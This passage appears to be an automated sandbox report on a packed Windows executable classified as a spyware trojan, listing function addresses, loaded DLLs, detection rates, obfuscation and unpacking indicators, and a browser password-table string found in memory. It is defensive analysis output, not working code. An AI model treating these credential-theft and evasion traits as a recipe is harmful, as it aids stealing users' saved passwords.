Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B548D9	0_2_00B548D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1C8C0	0_2_00B1C8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD4802	0_2_00AD4802
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B60807	0_2_00B60807
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C00872	0_2_00C00872
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8A80F	0_2_00B8A80F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF887D	0_2_00BF887D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF4860	0_2_00AF4860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA686F	0_2_00BA686F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCC86A	0_2_00BCC86A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF0854	0_2_00BF0854
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC0845	0_2_00BC0845
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B40848	0_2_00B40848
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C709D4	0_2_00C709D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF69B4	0_2_00AF69B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C309E1	0_2_00C309E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEE99B	0_2_00BEE99B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C009FA	0_2_00C009FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3A9F9	0_2_00C3A9F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B82987	0_2_00B82987
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C48985	0_2_00C48985
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6E9C5	0_2_00B6E9C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9893B	0_2_00B9893B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBE930	0_2_00BBE930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFC92E	0_2_00BFC92E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8692B	0_2_00B8692B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD4928	0_2_00BD4928
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE4926	0_2_00BE4926
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7692A	0_2_00B7692A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4E965	0_2_00C4E965
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1696D	0_2_00C1696D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C84965	0_2_00C84965
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C36975	0_2_00C36975
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB4901	0_2_00BB4901
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C38902	0_2_00C38902
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAA979	0_2_00BAA979
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA6904	0_2_00CA6904
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B00962	0_2_00B00962
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0961	0_2_00BB0961
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF2964	0_2_00BF2964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C46921	0_2_00C46921
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1C931	0_2_00C1C931
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD8945	0_2_00BD8945
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6C94C	0_2_00B6C94C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7EAB3	0_2_00B7EAB3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BECAA7	0_2_00BECAA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC8A9A	0_2_00BC8A9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC4A84	0_2_00BC4A84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3CAFC	0_2_00C3CAFC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCAAF8	0_2_00BCAAF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C50A83	0_2_00C50A83
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA4AFD	0_2_00BA4AFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C4AA89	0_2_00C4AA89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2EA8D	0_2_00C2EA8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B06AE5	0_2_00B06AE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD8AE2	0_2_00BD8AE2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4AAD0	0_2_00B4AAD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B08AC0	0_2_00B08AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDCA3E	0_2_00BDCA3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C08A4D	0_2_00C08A4D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE0A2C	0_2_00BE0A2C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC2A2B	0_2_00BC2A2B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C68A76	0_2_00C68A76
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8CA00	0_2_00B8CA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C12A7C	0_2_00C12A7C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB4A7E	0_2_00BB4A7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B72A71	0_2_00B72A71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B46A73	0_2_00B46A73
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C18A17	0_2_00C18A17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C76A25	0_2_00C76A25
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4EA4C	0_2_00B4EA4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB8A44	0_2_00BB8A44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0CBE5	0_2_00C0CBE5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2EBF6	0_2_00C2EBF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C52B8E	0_2_00C52B8E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B54BF9	0_2_00B54BF9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C58B97	0_2_00C58B97
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA2BE9	0_2_00BA2BE9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7ABA5	0_2_00C7ABA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1EBA4	0_2_00C1EBA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDABDA	0_2_00BDABDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3EBDC	0_2_00B3EBDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADCBD0	0_2_00ADCBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C64B44	0_2_00C64B44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3EB45	0_2_00C3EB45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD8B20	0_2_00AD8B20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B48B3A	0_2_00B48B3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C22B4C	0_2_00C22B4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C24B52	0_2_00C24B52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6CB57	0_2_00C6CB57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5CB57	0_2_00C5CB57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C14B5D	0_2_00C14B5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C34B5C	0_2_00C34B5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8EB10	0_2_00B8EB10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA2B16	0_2_00BA2B16
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA0B04	0_2_00BA0B04
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5AB08	0_2_00C5AB08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B14B60	0_2_00B14B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C72B13	0_2_00C72B13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAEB67	0_2_00BAEB67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5EB56	0_2_00B5EB56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDEB53	0_2_00BDEB53
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD2B50	0_2_00AD2B50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2ACC2	0_2_00C2ACC2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B52C9B	0_2_00B52C9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B1CC80	0_2_00B1CC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8CC8E	0_2_00B8CC8E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB4CEB	0_2_00BB4CEB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C10C99	0_2_00C10C99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF0CD1	0_2_00BF0CD1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCACCD	0_2_00BCACCD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC6CC4	0_2_00BC6CC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7CCCB	0_2_00B7CCCB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6EC4F	0_2_00C6EC4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B44C3E	0_2_00B44C3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B90C35	0_2_00B90C35
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6EC39	0_2_00B6EC39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C20C52	0_2_00C20C52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5EC57	0_2_00C5EC57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCEC2B	0_2_00BCEC2B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C06C5B	0_2_00C06C5B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C84C57	0_2_00C84C57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C02C61	0_2_00C02C61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9AC15	0_2_00B9AC15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6AC01	0_2_00B6AC01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C60C7E	0_2_00C60C7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6AC7D	0_2_00C6AC7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B70C61	0_2_00B70C61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B74C56	0_2_00B74C56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B42C5C	0_2_00B42C5C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5AC5D	0_2_00B5AC5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF2C57	0_2_00BF2C57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B62C5A	0_2_00B62C5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEB1D8	0_2_00AEB1D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEEDB8	0_2_00BEEDB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C40DC9	0_2_00C40DC9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA4DDC	0_2_00CA4DDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1ADD9	0_2_00C1ADD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C72DEF	0_2_00C72DEF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0CDF3	0_2_00C0CDF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B48D89	0_2_00B48D89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C22D86	0_2_00C22D86
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5AD80	0_2_00C5AD80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BBCDF1	0_2_00BBCDF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7ED90	0_2_00C7ED90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE8D3A	0_2_00BE8D3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C62D42	0_2_00C62D42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4D3A	0_2_00BF4D3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFCD20	0_2_00BFCD20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7ED17	0_2_00B7ED17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C46D65	0_2_00C46D65
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C76D61	0_2_00C76D61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAAD13	0_2_00BAAD13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5CD00	0_2_00B5CD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B60D03	0_2_00B60D03
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD4D03	0_2_00BD4D03
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B86D6C	0_2_00B86D6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C42D10	0_2_00C42D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA6D58	0_2_00BA6D58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEAD5A	0_2_00BEAD5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AECD45	0_2_00AECD45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C80D3C	0_2_00C80D3C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C70EC6	0_2_00C70EC6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFCEB6	0_2_00BFCEB6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C00EC9	0_2_00C00EC9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B56EA3	0_2_00B56EA3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7AEE4	0_2_00C7AEE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB0E94	0_2_00BB0E94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B66E85	0_2_00B66E85
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDEE89	0_2_00BDEE89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C74EFD	0_2_00C74EFD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC2E80	0_2_00BC2E80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC4E81	0_2_00BC4E81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEEEFE	0_2_00AEEEFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C26E9A	0_2_00C26E9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C50EAA	0_2_00C50EAA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6CEC5	0_2_00B6CEC5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BDCEC3	0_2_00BDCEC3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B8AE3B	0_2_00B8AE3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE0E3A	0_2_00BE0E3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7AE3C	0_2_00B7AE3C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C04E52	0_2_00C04E52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7CE08	0_2_00B7CE08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE4E01	0_2_00BE4E01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C3AE05	0_2_00C3AE05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BD8E74	0_2_00BD8E74
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0EE18	0_2_00C0EE18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C84E2A	0_2_00C84E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B78E43	0_2_00B78E43
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C56E3D	0_2_00C56E3D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B98E44	0_2_00B98E44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4EE4A	0_2_00B4EE4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C54E3B	0_2_00C54E3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3EFB9	0_2_00B3EFB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B52FB8	0_2_00B52FB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE0FA7	0_2_00BE0FA7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7AFDC	0_2_00C7AFDC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6AFA9	0_2_00B6AFA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B94F99	0_2_00B94F99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C82FEC	0_2_00C82FEC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAEF96	0_2_00BAEF96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C20FEE	0_2_00C20FEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C52FFC	0_2_00C52FFC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B7AF8D	0_2_00B7AF8D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE6F90	0_2_00AE6F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B12FF0	0_2_00B12FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C68F88	0_2_00C68F88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCEFED	0_2_00BCEFED
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3EFE1	0_2_00B3EFE1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9EFEF	0_2_00B9EFEF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C14F9A	0_2_00C14F9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA8FE6	0_2_00BA8FE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C2EF9D	0_2_00C2EF9D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C0CFB0	0_2_00C0CFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C46FB9	0_2_00C46FB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C6EFB9	0_2_00C6EFB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BB8F3E	0_2_00BB8F3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C5CF54	0_2_00C5CF54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C58F51	0_2_00C58F51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B42F2A	0_2_00B42F2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C24F61	0_2_00C24F61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF6F19	0_2_00BF6F19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C30F6D	0_2_00C30F6D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B74F76	0_2_00B74F76
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE6F71	0_2_00BE6F71

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00AEA420 appears 105 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00ADB380 appears 44 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: grpnkoxr ZLIB complexity 0.9948958253670848

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B08AC0 CoCreateInstance,

0_2_00B08AC0

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1573383134.0000000005739000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544513244.0000000005825000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1544872151.000000000574D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573255220.000000000575A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	ReversingLabs: Detection: 60%
Source: file.exe	Virustotal: Detection: 56%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 2078208 > 1048576

Source: file.exe

Static PE information: Raw size of grpnkoxr is bigger than: 0x100000 < 0x198a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;grpnkoxr:EW;gkiotden:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;grpnkoxr:EW;gkiotden:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x20b4e9 should be: 0x2078d7

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: grpnkoxr
Source: file.exe	Static PE information: section name: gkiotden
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3655D push 48C7DD26h; mov dword ptr [esp], edx	0_2_00B37325
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3655D push 13D33407h; mov dword ptr [esp], eax	0_2_00B3736B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B340B3 push edi; mov dword ptr [esp], edx	0_2_00B34008
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B340B2 push edi; mov dword ptr [esp], edx	0_2_00B34008
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B360AF push 341F845Fh; mov dword ptr [esp], esi	0_2_00B36134
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B360AF push ecx; mov dword ptr [esp], 12FB3782h	0_2_00B36138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860A6 push ebx; mov dword ptr [esp], eax	0_2_00B86622
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860A6 push 13D34F40h; mov dword ptr [esp], ecx	0_2_00B86706
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860A6 push eax; mov dword ptr [esp], ebx	0_2_00B86794
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860A6 push ebx; mov dword ptr [esp], esp	0_2_00B86837
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B860A6 push ebx; mov dword ptr [esp], 7C4637C7h	0_2_00B868C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA00A5 push 521B4710h; mov dword ptr [esp], ecx	0_2_00BA00D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA00A5 push edx; mov dword ptr [esp], eax	0_2_00BA0131
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA00A5 push eax; mov dword ptr [esp], 40CDF417h	0_2_00BA01EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA00A5 push edx; mov dword ptr [esp], ecx	0_2_00BA01FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3609E push 341F845Fh; mov dword ptr [esp], esi	0_2_00B36134
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3609E push ecx; mov dword ptr [esp], 12FB3782h	0_2_00B36138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B340E0 push ebp; mov dword ptr [esp], edx	0_2_00B34278
